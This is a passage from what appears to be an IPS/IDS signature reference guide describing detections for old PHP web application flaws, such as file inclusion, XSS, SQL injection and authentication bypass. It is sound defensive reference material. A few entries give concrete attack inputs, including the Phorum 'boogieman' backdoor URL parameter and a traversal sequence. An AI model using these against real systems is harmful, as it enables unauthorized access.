Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_embed.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1832
WEB-PHP Advanced Poll admin_help.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_help.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1833
WEB-PHP Advanced Poll admin_license.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_license.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1834
WEB-PHP Advanced Poll admin_logout.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_logout.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1835
WEB-PHP Advanced Poll admin_password.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_password.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1836
WEB-PHP Advanced Poll admin_preview.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_preview.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1837
WEB-PHP Advanced Poll admin_settings.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_settings.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1838
WEB-PHP Advanced Poll admin_stats.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_stats.php script using the 'base_path'
or 'pollvars[lang]' variables, a remote attacker could read arbitrary files or include arbitrary local PHP files.
No remedy available as of August 2008.
Signature ID: 1839
WEB-PHP Advanced Poll admin_templates.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_templates.php script using the 'base_path'
or 'pollvars[lang]' variables, a remote attacker could read arbitrary files or include arbitrary local PHP files.
No remedy available as of August 2008.
Signature ID: 1840
WEB-PHP Advanced Poll admin_templates_misc.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_templates_misc.php script using the
'base_path' or 'pollvars[lang]' variables, a remote attacker could read arbitrary files or include arbitrary local PHP
files. No remedy available as of August 2008.
Signature ID: 1841
WEB-PHP Advanced Poll admin_tpl_misc_new.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_tpl_misc_new.php script using the
'base_path' or 'pollvars[lang]' variables, a remote attacker could read arbitrary files or include arbitrary local PHP
files. No remedy available as of August 2008.
Signature ID: 1842
WEB-PHP Advanced Poll admin_tpl_new.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_tpl_new.php script using the 'base_path'
or 'pollvars[lang]' variables, a remote attacker could read arbitrary files or include arbitrary local PHP files.
No remedy available as of August 2008.
Signature ID: 1846
WEB-PHP Blahz-DNS dostuff.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0599 Bugtraq: 4618
Signature Description: Blahz-DNS is a PHP/MySQL-based DNS administration tool with support for primary and
secondary zones, user authentication, User and Admin account types, and restricted access for user accounts to certain
primary and secondary zones. It is available for Linux systems. Blahz-DNS (version 0.2 and prior) contains a flaw
that may allow a malicious user to bypass authentication and modify DNS entries. A remote attacker can access PHP
scripts such as dostuff.php directly, instead of going through the login screen, to gain administrator access to the
Blahz-DNS system. Upgrade to the latest version of Blahz-DNS, available at the vendor's website.
Signature ID: 1847
WEB-PHP Blahz-DNS dostuff.php modify user authentication Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0599 Bugtraq: 4618
Signature Description: Blahz-DNS is a PHP/MySQL-based DNS administration tool with support for primary and
secondary zones, user authentication, User and Admin account types, and restricted access for user accounts to certain
primary and secondary zones. It is available for Linux systems. Blahz-DNS (version 0.2 and prior) contains a flaw
that may allow a malicious user to bypass authentication and modify DNS entries. A remote attacker can access PHP
scripts such as dostuff.php directly, instead of going through the login screen, to gain administrator access and modify
the user accounts of the Blahz-DNS system. Upgrade to the latest version of Blahz-DNS, available at the vendor's website.
Signature ID: 1848
WEB-PHP Cyboards default_header.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2007-1983 Bugtraq: 6597
Signature Description: CyBoards PHP Lite is a lightweight PHP/MySQL message board system with a threaded style.
CyBoards provides e-commerce consulting, shopping carts, and web design services for businesses looking to
establish Internet storefronts. CyBoards PHP Lite version 1.21 could allow a remote attacker to include arbitrary files.
A remote attacker could send a specially-crafted URL request to the default_header.php script using the script_path
parameter to specify a malicious file on a remote system, which could allow the attacker to execute arbitrary code with
the privileges of the target server. Upgrade to the latest version of CyBoards PHP Lite, available at the vendor's website.
Signature ID: 1849
WEB-PHP Cyboards options_form.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2007-1983 Bugtraq: 6597
Signature Description: CyBoards PHP Lite is a lightweight PHP/MySQL message board system with a threaded style.
CyBoards provides e-commerce consulting, shopping carts, and web design services for businesses looking to
establish Internet storefronts. CyBoards PHP Lite version 1.21 could allow a remote attacker to include arbitrary files.
A remote attacker could send a specially-crafted URL request to the 'options_form.php' script using the script_path
parameter to specify a malicious file on a remote system, which could allow the attacker to execute arbitrary code with
the privileges of the target server. Upgrade to the latest version of CyBoards PHP Lite, available at the vendor's website.
251
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
Signature ID: 1850
WEB-PHP DCP-Portal remote file include editor script vulnerability
Threat Level: Warning
Industry ID: CVE-2006-4837 Bugtraq: 6525,20024
Signature Description: DCP-Portal is a content management system that enables various web-based updates. It enables
an administrator to remotely manage the entire site, and allows members to submit news, content, reviews, etc.
DCP-Portal (version 6.0) could allow remote attackers to include arbitrary files. A remote attacker could send a
specially-crafted URL to the library/editor/editor.php script using the root parameter. An attacker could use this
vulnerability to execute arbitrary PHP code on the vulnerable web server. No remedy available as of September 2008.
Signature ID: 1852
WEB-PHP DNSTools administrator authentication bypass Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0613 Bugtraq: 4617
Signature Description: DNSTools is a web-based management tool for DNS information. It is implemented in PHP,
and available for Linux and Solaris. DNSTools (version 2.0b2 and prior) could allow a remote attacker to bypass
authentication and modify DNS entries. A remote attacker could send a specially-crafted URL request to the
dnstools.php script containing manipulated values for the user_dnstools_administrator variable to gain administrator
access to DNSTools. Upgrade to the latest version of DNSTools (2.0 beta 5 or later), available at the vendor's website.
Signature ID: 1853
WEB-PHP DNSTools authentication bypass Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0613 Bugtraq: 4617
Signature Description: DNSTools is a web-based management tool for DNS information. It is implemented in PHP,
and available for Linux and Solaris. DNSTools (version 2.0b2 and prior) could allow a remote attacker to bypass
authentication and modify DNS entries. A remote attacker could send a specially-crafted URL request to the
dnstools.php script containing manipulated values for the user_logged_in variable to gain administrator access to
DNSTools. Upgrade to the latest version of DNSTools (2.0 beta 5 or later), available at the vendor's website.
Signature ID: 1854
WEB-PHP MediaWiki DatabaseFunctions.php access Vulnerability
Threat Level: Information
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki which can be exploited by malicious people to
compromise a vulnerable system. The vulnerability is caused by an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
Affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829. This signature detects access to
DatabaseFunctions.php.
Signature ID: 1855
WEB-PHP MediaWiki GlobalFunctions.php access Vulnerability
Threat Level: Information
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki which can be exploited by malicious people to
compromise a vulnerable system. The vulnerability is caused by an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
Affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829. This signature detects access to
GlobalFunctions.php.
Signature ID: 1856
WEB-PHP IGeneric Free Shopping Cart page.php access Vulnerability
Threat Level: Information
Bugtraq: 9773
Signature Description: IGeneric Free Shopping Cart is a freely available shopping cart implemented in PHP with a
MySQL backend. IGeneric Free Shopping Cart (version 1.4) is vulnerable to cross-site scripting. A remote attacker
could embed malicious script within the type_id variable in a URL request to the page.php script, which would be
executed in the victim's web browser once the link is clicked. An attacker could use this vulnerability to steal the
victim's cookie-based authentication credentials. No remedy available as of August 2008.
Signature ID: 1857
WEB-PHP IdeaBox cord.php file include Vulnerability
Threat Level: Information
Bugtraq: 7488
Signature Description: PhpOutsourcing IdeaBox is a web-based suggestion box. It is available for a variety of
platforms including Microsoft Windows, Linux, and Unix. IdeaBox (PhpOutsourcing IdeaBox versions 1.0 and 1.1)
could allow a remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the
generformlib_date.php, notification.php, zmail.php, user.php, globalsettings.php, init.php, idea.php, history.php or
cord.php scripts using the $gorumDir or $ideaDir variable to specify a malicious PHP file on a remote system, a remote
attacker could execute arbitrary code on the affected server. No remedy available as of August 2008. This signature
detects traffic to cord.php.
Signature ID: 1858
WEB-PHP IdeaBox notification.php file include Vulnerability
Threat Level: Information
Bugtraq: 7488
Signature Description: PhpOutsourcing IdeaBox is a web-based suggestion box. It is available for a variety of
platforms including Microsoft Windows, Linux, and Unix. IdeaBox (PhpOutsourcing IdeaBox versions 1.0 and 1.1)
could allow a remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the
generformlib_date.php, notification.php, zmail.php, user.php, globalsettings.php, init.php, idea.php, history.php or
cord.php scripts using the $gorumDir or $ideaDir variable to specify a malicious PHP file on a remote system, a remote
attacker could execute arbitrary code on the affected server. No remedy available as of August 2008. This signature
detects traffic to notification.php.
Signature ID: 1859
WEB-PHP Invision Board emailer.php file include Vulnerability
Threat Level: Information
Bugtraq: 7204
Signature Description: Invision Board is web forum software. It is implemented in PHP and is available for the Unix,
Linux, and Microsoft Windows operating systems. Invision Power Board version 1.1.1 is vulnerable. If register_globals
and allow_url_fopen are enabled, a remote attacker could send a specially-crafted URL request to the ad_member.php
script that specifies a malicious file from a remote system as a parameter, which would allow the attacker to execute
code on the vulnerable Web server.
Signature ID: 1860
WEB-PHP Invision Board ipchat.php file include Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1385 Bugtraq: 6976
Signature Description: Invision Board is web forum software. It is implemented in PHP and is available for the Unix,
Linux, and Microsoft Windows operating systems. Invision Board is prone to an issue that may allow remote attackers
to include files located on attacker-controlled servers. This vulnerability results from insufficient sanitization of
remote user-supplied data used in URI parameters of certain PHP pages. A remote attacker could send a
specially-crafted URL request to the ipchat.php script that specifies the conf_global.php script from a remote system as
a parameter, which would allow the attacker to execute code on the vulnerable Web server. The vulnerable version is
Invision Board 1.1.1.
Signature ID: 1861
WEB-PHP MatrikzGB privilege escalation Vulnerability
Threat Level: Information
Bugtraq: 8430
Signature Description: MatrikzGB Guestbook is a web application implemented in PHP. MatrikzGB could allow a
remote attacker to gain unauthorized administrative access to the guestbook, caused by a vulnerability in the
index.php script. A remote attacker with a valid user account can modify the account by sending a specially-crafted
HTTP request with the 'new_rights' parameter set to a value of 'admin', allowing the attacker to gain unauthorized
administrative access to the guestbook and obtain other users' passwords in plain text. The affected version is
MatrikzGB 2.0 and prior. No remedy available as of August 2008.
Signature ID: 1862
WEB-PHP Messagerie supp_membre.php access Vulnerability
Threat Level: Information
Bugtraq: 4635
Signature Description: Messagerie is a web message board application maintained by La Basse. An issue has been
discovered in Messagerie which could allow an attacker to delete arbitrary user accounts. Reportedly, submitting a
specially-crafted URL will successfully remove user accounts. Messagerie version 1.0 is vulnerable.
Signature ID: 1863
WEB-PHP Opt-X header.php remote file include Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2368 Bugtraq: 9732
Signature Description: Opt-X version 0.7.2 and possibly earlier versions could allow a remote attacker to include
malicious PHP files. A remote attacker could send a specially-crafted URL request to the header.php script that
specifies a malicious file from a remote system as a parameter, which would allow the attacker to execute code on the
vulnerable system. No remedy available as of August 2008.
Signature ID: 1864
WEB-PHP PHP-Nuke remote file include vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0206 Bugtraq: 3889
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. The system is fully controlled using a web-based user interface. PHP-Nuke (versions 5.3.1 and
earlier, and possibly other versions below 5.5) could allow remote attackers to execute arbitrary commands on the
Web server, caused by a vulnerability in the index.php script. A remote attacker could send a specially-crafted URL
request to the index.php script using the 'file' variable, which would cause arbitrary commands to be executed on the
local shell of the host running the vulnerable Web site with the privileges of the Web server process. Upgrade to the
latest version of PHP-Nuke (5.5 or later), available at the vendor's website.
Signature ID: 1865
PHP-Wiki Cross-Site Scripting Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1070 Bugtraq: 5254
Signature Description: PhpWiki (version 1.3.3 and prior) contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate the pagename variable in the wiki module. This
could allow a user to create a specially-crafted URL that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading to a loss of integrity. No remedy available as of
September 2008.
Signature ID: 1866
PhpBB viewforum.php and viewtopic.php scripts allow cross-site scripting Vulnerability
Threat Level: Information
Industry ID: CVE-2004-1809 Bugtraq: 9866 Nessus: 12093
Signature Description: PhpBB (PHP Bulletin Board) is the most widely used forum script currently on the web. It is a
free and very powerful piece of software, easy to install and administer, and allows flexibility in terms of design and
organization. PhpBB (version 2.0.6d and prior) is vulnerable to cross-site scripting. A remote attacker could embed
malicious code in a specially-crafted URL request to the viewforum.php or viewtopic.php script, which would be
executed in the victim's browser once the link is clicked. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials.
Signature ID: 1867
PHPLIB remote script execution vulnerability
Threat Level: Information
Industry ID: CVE-2001-1370 Bugtraq: 3079
Signature Description: The PHP Base Library ('PHPLIB') is a code library which provides support for session
management in web applications. It is targeted at developers and is widely used in many web applications, so a strong
possibility exists that an application may be using it without the knowledge of the administrator. A problem in
PHPLIB (versions 7.2, 7.2b, 7.2c, and 7.2.1) allows remote attackers to submit malicious input in web requests that
will cause the application to fetch and then execute scripts from another host. This may allow attackers to gain local
access to the web server. Upgrade to the latest version of PHPLIB (7.2d-1 tr or later).
Signature ID: 1868
PHPNuke Forum Module Viewtopic.php SQL Injection Vulnerability
Threat Level: Information
Bugtraq: 7193
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. The system is fully controlled using a web-based user interface. PHP-Nuke (versions 6.0 and
6.5 rc2) is vulnerable to SQL injection. An input validation error exists in the 'viewtopic.php' script included with
PHP-Nuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHP-Nuke
that would allow the attacker to inject SQL commands and queries into the SQL database used by PHP-Nuke. No
remedy available as of September 2008.
Signature ID: 1869
PayPal Store Front index.php Remote File Include Vulnerability
Threat Level: Warning
Bugtraq: 8791 Nessus: 11873
Signature Description: PayPal is an online shopping cart system that lets anyone with an email address securely send
and receive online payments using their credit card or bank account. PayPal requires PHP4 and a MySQL database on
a Unix or Linux-based operating system. PayPal Store Front (version 3.0) could allow a remote attacker to include
malicious PHP files, caused by a vulnerability in the index.php script. By sending a specially-crafted URL request to
the index.php script using the 'page' variable, an attacker could execute arbitrary code on the vulnerable web server.
No remedy available as of September 2008.
Signature ID: 1870
WEB-PHP Phorum Multiple Cross-Site Scripting/HTML Injection Vulnerabilities
Threat Level: Information
Industry ID: CVE-2004-0034 Bugtraq: 9361
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin-board-style chat forums.
Phorum (versions 3.4, 3.4.1, and 3.4.5) is vulnerable to cross-site scripting. A remote attacker could create a malicious
URL link containing embedded script to the common.php, profile.php, or login.php scripts, which would be executed
once the link is clicked. An attacker can use this vulnerability to execute arbitrary code on the vulnerable server.
Signature ID: 1871
WEB-PHP Phorum Arbitrary File Read Vulnerability
Threat Level: Information
Bugtraq: 1997
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin-board-style chat forums.
Phorum (version 3.0.x) could allow a remote attacker to traverse directories on the server. A remote attacker could
send a specially-crafted URL to common.php containing "dot dot" sequences (/../) to read files on the web server. An
attacker can use this vulnerability to obtain sensitive information, such as valid accounts. Upgrade to the latest version
of Phorum, available at the vendor's website.
Signature ID: 1872
WEB-PHP Phorum admin access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1228 Bugtraq: 2271
Signature Description: Phorum can allow remote users access to restricted files on the local system. This is due to the
program's handling of passwords. By sending a custom-crafted string to the admin.php3 script, it is possible to change
the administrative password of the board without verification of the user's credentials. The "default.langname name"
field in the Master settings can then be changed to any file of the user's choosing, which upon reload will be output as
the page. This problem makes it possible for a user with malicious motives to take control of the message board, read
any file on the system, and potentially gain remote access. Phorum version 3.0.7 is vulnerable. Upgrade to the latest
version of Phorum (3.2.11), available at the vendor's website.
Signature ID: 1873
WEB-PHP Phorum authentication access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1230 Bugtraq: 2274
Signature Description: Phorum is a freely available, open source, popular WWW board written by Brian Moon. A
problem with the package allows users access to any resources within the bulletin board system. Any file that is access
controlled by the auth.php3 script may be accessed, due to a backdoor password written into the auth.php3 script. The
password "boogieman" will permit users to access files controlled by auth.php3 by simply appending the variable
PHP_AUTH_USER=boogieman to the URL. This makes it possible for users with malicious intentions to access any
file under the access control of auth.php3, and potentially gain elevated privileges, including access to the local system.
Phorum version 3.0.7 is vulnerable. Upgrade to the latest version of Phorum (3.2.11), available at the vendor's website.
Signature ID: 1874
WEB-PHP Phorum code access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1231
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin-board-style chat forums. The
code.php3 script of Phorum (version 3.0.7) can be used to display the contents of files located in the Phorum directory,
which may contain sensitive information. A remote attacker could use this script to read arbitrary files in the Phorum
directory via the query string. Upgrade to the latest version of Phorum (3.0.8 or later), available at the vendor's website.
Signature ID: 1875
WEB-PHP Phorum read access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1233
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin-board-style chat forums. Phorum
(version 3.0.7) is vulnerable to SQL injection. By sending specially-crafted SQL statements to the read.php3 script, a
remote attacker could use this vulnerability to add, modify, or delete information in the back-end database. Upgrade
to the latest version of Phorum (3.2.11 or later), available at the vendor's website.
Signature ID: 1876
WEB-PHP Phorum violation access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-1234 Bugtraq: 2272
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin-board-style chat forums. Phorum
(version 3.0.7) allows remote users to arbitrarily relay email. A remote attacker could create a specially-crafted URL
request to the violation.php3 script using the ForumName and Mod variables, which could allow the attacker to send
e-mail to arbitrary addresses. Upgrade to the latest version of Phorum (3.2.11), available at the vendor's website.
Signature ID: 1877
WEB-PHP Photopost PHP Pro showphoto.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0239 CVE-2004-0250 Bugtraq: 9557
Signature Description: PhotoPost is photo sharing gallery software written in PHP. PhotoPost PHP Pro (version 4.6
and prior) is vulnerable to SQL injection, caused by an input validation vulnerability. A remote attacker could exploit
this vulnerability by passing malicious SQL commands to the showphoto.php script using the 'photo' variable, which
would allow the attacker to obtain sensitive information or possibly add, modify, or delete information in the backend
database.
Signature ID: 1878
WEB-PHP PhpGedView PGV authentication_index.php base directory manipulation Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0030 Bugtraq: 9368 Nessus: 11982
Signature Description: PHPGedView (PGV) is a free PHP-based web application for working with genealogy data on
the Internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports multimedia.
PHPGedView (version 2.61) is prone to multiple file include vulnerabilities. By sending a specially-crafted URL
request to the authentication_index.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious
file from a remote system as a parameter, a remote attacker could execute arbitrary code on the vulnerable server.
Upgrade to the latest version, which is available at the vendor's website.
Signature ID: 1879
WEB-PHP PhpGedView PGV base directory manipulation Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0030 Bugtraq: 9368 Nessus: 11982
Signature Description: PHPGedView (PGV) is a free PHP-based web application for working with genealogy data on
the Internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports multimedia.
PHPGedView (version 2.61) is prone to multiple file include vulnerabilities. By sending a specially-crafted URL
request to the _conf.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious file from a
remote system as a parameter, a remote attacker could execute arbitrary code on the vulnerable server. Upgrade to the
latest version, which is available at the vendor's website.
Signature ID: 1880
WEB-PHP PhpGedView config_gedcom.php base directory manipulation Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0030 Bugtraq: 9368 Nessus: 11982
Signature Description: PHPGedView (PGV) is a free PHP-based web application for working with genealogy data on
the Internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports multimedia.
PHPGedView (version 2.61) is prone to multiple file include vulnerabilities. By sending a specially-crafted URL
request to the config_gedcom.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious file
from a remote system as a parameter, a remote attacker could execute arbitrary code on the vulnerable server. Upgrade
to the latest version, which is available at the vendor's website.
Signature ID: 1881
WEB-PHP PhpGedView functions.php base directory manipulation Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0030 Bugtraq: 9368 Nessus: 11982
Signature Description: PHPGedView (PGV) is a free PHP-based web application for working with genealogy data on
the Internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports multimedia.
PHPGedView (version 2.61) is prone to multiple file include vulnerabilities. By sending a specially-crafted URL
request to the functions.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious file from a
remote system as a parameter, a remote attacker could execute arbitrary code on the vulnerable server. Upgrade to the
latest version, which is available at the vendor's website.
Signature ID: 1882
WEB-PHP PhpGedView search.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0032 Bugtraq: 9369 Nessus: 11982
Signature Description: PHPGedView (PGV) is a free PHP-based web application for working with genealogy data on
the Internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports multimedia.
PHPGedView (version 2.61) is vulnerable to cross-site scripting. By creating a specially-crafted URL link to the
search.php script containing embedded code in the 'firstname' variable, a remote attacker could execute arbitrary code
in the victim's web browser once the link is clicked. No remedy available as of August 2008.
Signature ID: 1883
WEB-PHP MediaWiki Setup.php access Vulnerability
Threat Level: Information
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki which can be exploited by malicious people to
compromise a vulnerable system. The vulnerability is caused by an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
The affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829.
Signature ID: 1884
WEB-PHP TUTOS path disclosure Vulnerability
Threat Level: Information
Bugtraq: 10129
Signature Description: TUTOS (The Ultimate Team Organization Software) is a freely available, open-source team
organization software package. It is available for UNIX, Linux, and Microsoft Windows operating systems. TUTOS
version 1.1.20030715 is vulnerable to cross-site scripting, caused by improper filtering of user-supplied input. A remote
attacker could embed malicious script in a URL request to the note_overview.php script using the id variable; the script
would execute in the victim's browser once the link is clicked. An attacker could use this vulnerability to obtain the
victim's cookie-based authentication credentials. Upgrade to the latest version of TUTOS, available at the vendor's
website.
Signature ID: 1885
WEB-PHP MediaWiki Title.php access Vulnerability
Threat Level: Information
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki which can be exploited by malicious people to
compromise a vulnerable system. The vulnerability is caused by an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
The affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829. This signature detects access to
Title.php.
Signature ID: 1886
WEB-PHP Typo3 translations.php file include Vulnerability
Threat Level: Information
Bugtraq: 6984
Signature Description: TYPO3 is a free and open-source content management system. It is written in PHP and runs on
UNIX and Windows operating systems. TYPO3 versions 3.5b5 and prior could allow a remote attacker to include remote
files on the system. By sending a specially crafted URL request to the translations.php script that specifies a remote
file using the 'ONLY' parameter, a remote attacker could execute arbitrary code on the system. Upgrade to the latest
version, available at the vendor's website.
Signature ID: 1887
WEB-PHP MediaWiki UpdateClasses.php access Vulnerability
Threat Level: Information
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki which can be exploited by malicious people to
compromise a vulnerable system. The vulnerability is caused by an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
The affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829. This signature detects access to
UpdateClasses.php.
Signature ID: 1888
WEB-PHP WAnewsletter db_type.php access Vulnerability
Threat Level: Warning
Bugtraq: 6964
Signature Description: WAnewsletter is a newsletter management script. It is implemented in PHP and runs on
Microsoft Windows and Unix/Linux operating systems. WAnewsletter versions 2.0.2 through 2.1.0 could allow a
remote attacker to include malicious PHP files. By sending a specially crafted URL request to the sql/db_type.php
script that specifies a remote file using the 'waroot' parameter, a remote attacker could exploit this vulnerability and
execute arbitrary code on the vulnerable web server. Upgrade to the latest version of WAnewsletter, available at the
vendor's website.
Signature ID: 1889
WEB-PHP WAnewsletter newsletter.php file include Vulnerability
Threat Level: Warning
Bugtraq: 6965
Signature Description: WAnewsletter is a newsletter management script. It is implemented in PHP and runs on
Microsoft Windows and Unix/Linux operating systems. WAnewsletter versions 2.0.2 through 2.1.0 could allow a
remote attacker to include malicious PHP files. By sending a specially crafted URL request to the newsletter.php script
that specifies a remote file using the 'waroot' parameter, a remote attacker could exploit this vulnerability and
execute arbitrary code on the vulnerable web server. Upgrade to the latest version of WAnewsletter, available at the
vendor's website.
Signature ID: 1890
WEB-PHP WebChat db_mysql.php file include Vulnerability
Threat Level: Warning
Industry ID: CVE-2007-0485 Bugtraq: 7000,22153
Signature Description: WebChat is an open-source PHP-based chat program developed by Webdev. WebChat version
0.77 could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially crafted
